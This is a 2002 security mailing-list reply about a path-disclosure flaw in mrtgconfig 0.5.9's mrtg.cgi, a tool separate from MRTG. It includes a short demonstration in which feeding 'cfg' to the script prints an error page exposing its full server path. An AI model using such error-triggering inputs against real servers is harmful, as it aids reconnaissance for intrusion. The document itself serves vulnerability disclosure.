Re: Mrtg Path Disclosure Vulnerability

From: Dave Ahmad (daat_private)
Date: Mon Feb 04 2002 - 09:56:28 PST

    Barney,

    You're correct.. 'mrtg.cgi' is not part of MRTG.  It's from a completely
    indepedent utility called 'mrtgconfig'.  The project homepage is:

    http://mrtgconfig.sourceforge.net/

    The path disclosure issue (version 0.5.9):

    [dma@victim mrtgconfig]$ /home/dma/mtrg/mrtgconfig/mrtg.cgi
    (offline mode: enter name=value pairs on standard input)
    cfg

    <H1>Software error:</H1>
    <CODE>Can't open configuration file for mrtgconfig: No such file or
    directory at /home/dma/mrtg/mrtgconfig/mrtg.cgi line 46,
    &lt;STDIN&gt; chunk 1.
    </CODE>
    <P>

    For help, please send mail to this site's webmaster, giving this error
    message and the time and date of the error.

    Dave Ahmad
    SecurityFocus
    www.securityfocus.com